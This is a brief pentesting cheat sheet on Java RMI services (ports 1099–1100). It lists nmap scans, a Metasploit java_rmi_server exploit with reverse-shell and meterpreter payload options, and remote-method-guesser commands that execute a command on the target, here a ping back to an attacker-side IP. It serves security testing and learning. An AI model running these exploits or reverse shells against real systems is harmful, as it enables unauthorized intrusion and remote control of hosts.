Skip to content

1099,1100 – Pentesting rmi java

RMI (Remote Method Invocation) is a Java API that allows Java objects to invoke methods on remote objects, in other words, it enables Java applications to invoke methods of objects running on remote JVMs (Java Virtual Machines). It provides a mechanism for creating distributed Java applications, where objects on different JVMs can interact with each other.

nmap

sudo nmap -p 1098,1099,1100 -Pn $IP
sudo nmap -p 1099 -Pn -sC -sV $IP
|->
1100/tcp  open  java-rmi     Java RMI

metasploit

use exploit/multi/misc/java_rmi_server
show payloads
# set pyload payload/generic/shell_reverse_tcp
# set payload payload/java/meterpreter/reverse_tcp
options
set RHOSTS 10.0.2.8
run

remote method guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.3.1/rmg-4.3.1-jar-with-dependencies.jar -O /opt/tools/rmg.jar

java -jar rmg.jar enum $IP 1100

java -jar rmg.jar call $IP 1100 '"ping -c 10 192.168.119.199"' --signature 'String execute(String cmd)' --bound-name plain-server